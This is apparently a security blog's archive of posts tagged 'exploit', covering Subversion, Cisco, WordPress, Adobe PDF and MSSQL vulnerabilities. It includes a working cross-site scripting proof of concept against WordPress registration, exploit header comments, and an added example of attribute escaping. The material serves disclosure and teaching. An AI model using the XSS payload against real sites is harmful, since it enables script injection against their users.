Posts Tagged “exploit”

Subversion 0.3.7/1.0.0 Remote Buffer Overflow Exploit

[sourcecode language='c']
/***********************************************************
* hoagie_subversion.c
*
* Remote exploit against Subversion-Servers.
*
* Author: KnbykL <info@knbykl.org>
*
* Tested on Subversion 1.0.0 and 0.37
*
* Algorithm:
* This is a two-stage exploit. The first stage overflows
* a buffer on the stack and leaves us ~60 bytes of machine
* code to be executed. We try to find the socket-fd there
* and then do a read(2) on the socket. The exploit then
* sends the second stage loader to the server, which can
* be of any length (up to the obvious limits, of course).
* This second stage loader spawns /bin/sh on the server
* and connects it to the socket-fd.
*
* Credits:
*    void.at
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND
* A PROOF-OF-CONCEPT. THE AUTHOR CAN NOT BE HELD
* RESPONSIBLE FOR ANY DAMAGE OR CRIMINAL ACTIVITIES
* DONE USING THIS PROGRAM.
*
***********************************************************/
[/sourcecode]

Bugtraq ID: 25822

Class: Access Validation Error

CVE:

Remote: Yes

Local: No

Published: Sep 26 2007 12:00AM

Updated: Sep 28 2007 04:39PM

Credit: The vendor credits Lee E. Rian with the discovery of this vulnerability.

Vulnerable:

  • Cisco Catalyst 7600 3.1 (1a)WS-X6380-NAM
  • Cisco Catalyst 7600 3.1 (1a)WS-SVC-NAM-2
  • Cisco Catalyst 7600 3.1 (1a)WS-SVC-NAM-1
  • Cisco Catalyst 7600 2.2 (1a)WS-SVC-NAM-2
  • Cisco Catalyst 7600 2.2 (1a)WS-SVC-NAM-1
  • Cisco Catalyst 7600 2.1 (2)WS-X6380-NAM
  • Cisco Catalyst 7600 Sup720/MSFC3
  • Cisco Catalyst 7600 Sup2/MSFC2
  • Cisco Catalyst 6500 7.6 (1)
  • Cisco Catalyst 6500 7.5 (1)
  • Cisco Catalyst 6500 5.4.1
  • Cisco Catalyst 6500 3.1 (1a)WS-X6380-NAM
  • Cisco Catalyst 6500 3.1 (1a)WS-SVC-NAM-2
  • Cisco Catalyst 6500 3.1 (1a)WS-SVC-NAM-1
  • Cisco Catalyst 6500 2.2 (1a)WS-SVC-NAM-2

[From Cisco Catalyst 6500 and Cisco 7600 Loopback Access Control Bypass Vulnerability]

Let me add … Luckily Cisco noticed this "little thing", otherwise what a disaster it would have been, right?


I consider it discourteous to publish this kind of information, especially when it concerns the "host" of this very blog … but all things considered … security is an open and shared process.

Bugtraq ID: 25769

Class: Input Validation Error

CVE:

Remote: Yes

Local: No

Published: Sep 22 2007 12:00AM

Updated: Sep 22 2007 12:00AM

Credit: Adrian Pastor is credited with the discovery of these vulnerabilities.

Vulnerable: WordPress WordPress 2.0

And here is the PoC

[sourcecode language='xml']
<html>
<head></head>
<body>

<form method="post" action="http://target/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login"
value='"><script>alert(1)</script>' />
<input type="hidden" name="user_email" id="user_email"
value='"><script>alert(2)</script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
[/sourcecode]

[From WordPress wp-register.php Multiple Cross-Site Scripting Vulnerabilities]
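The PoC above works because wp-register.php reflected the submitted `user_login` and `user_email` values back into HTML attributes without encoding, so a `"` in the input closes the attribute and the rest is parsed as markup. The following added example (not code from the original post or from WordPress) shows the vulnerable concatenation beside the hardened form, using contextual output encoding for the double-quoted attribute context; `escapeHtmlAttr`, `renderRegisterFieldVulnerable`, `renderRegisterFieldSafe` and `countTags` are hypothetical helper names, and the payload string is constructed from the PoC for the check.

```javascript
// Added example: attribute-context output encoding for a reflected form field.
// Not code from the original post or from WordPress; helper names are hypothetical.

// Constructed test input, taken from the PoC's user_login value.
const CONSTRUCTED_PAYLOAD = '"><script>alert(1)</script>';

// Encode the five characters that can break out of a double-quoted HTML
// attribute or start new markup once the attribute is closed.
function escapeHtmlAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Vulnerable rendering: the untrusted value is concatenated verbatim,
// so the leading quote in the payload terminates the value attribute and
// the <script> element that follows is parsed as real markup.
function renderRegisterFieldVulnerable(name, value) {
  return '<input type="text" name="' + name + '" id="' + name +
         '" value="' + value + '" />';
}

// Hardened rendering: identical markup, but the value is encoded for the
// attribute context first, so the browser sees one input element whose
// value happens to contain angle brackets and quotes.
function renderRegisterFieldSafe(name, value) {
  return '<input type="text" name="' + name + '" id="' + name +
         '" value="' + escapeHtmlAttr(value) + '" />';
}

// Reviewer's check: count element openings in the rendered markup. The
// vulnerable output contains two (<input and <script), the safe output one.
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// Stand-alone demonstration.
console.log('vulnerable:', renderRegisterFieldVulnerable('user_login', CONSTRUCTED_PAYLOAD));
console.log('hardened:  ', renderRegisterFieldSafe('user_login', CONSTRUCTED_PAYLOAD));
```

The encoding is specific to the double-quoted attribute context; a value placed into a JavaScript string, a URL or a CSS property needs the encoder for that context instead, which is the general point behind the fix WordPress shipped for this class of bug.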


The term 0Day has by now become a full-blown buzzword.

But, as always happens, it is worth paying attention when the one using it is a person (in this case a team) of note; I am referring to the guys at GNUCitizen

Adobe PDF PWNS WINDOWS

What can be read in their project section goes roughly like this:

I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one. [From 0day: PDF pwns Windows | GNUCITIZEN]

And the recommendation is …

The issue is quite critical given the fact that PDF documents are in the core of today’s modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available.

… I think such a magnanimous gesture will cost the Adobe folks dearly; that much "love" is not seen every day. Imagine if, on the other side, it had been Microsoft! ;) It continues …

Adobe's representatives can contact me from the usual place. My advice for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issue was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions are also affected.

… yes, sure, of course! Just switch operating system, so simple … !!! Luckily Evince and Preview exist. In conclusion, we do not have a PoC, for better or for worse, but, in the YouTube era, we can at least indulge ourselves by watching what happens :)

0day: PDF pwns Windows [From 0day: PDF pwns Windows | GNUCITIZEN]


Old or not, exploitable bugs are always welcome!

[sourcecode language='xml']
<!--

+ title: Microsoft SQL Server Distributed Management Objects Buffer Overflow
+ Critical: Critical (remote)
+ Impact: MS Internet Explorer 6 -> Code Execute
+ Tested Operating System: Windows XP SP2 KR, Windows 2000 Pro SP4 KR
+ Tested Software: MSDE 2000 SQLDMO.dll (version 2000.80.760.0)
+ Reference & Thanks :
code by rgod http://www.milw0rm.com/exploits/4379
code by Trirat Puttaraksa http://www.milw0rm.com/exploits/2426
+ Author: 96sysim (sysim@nate.com)

-->
[/sourcecode]
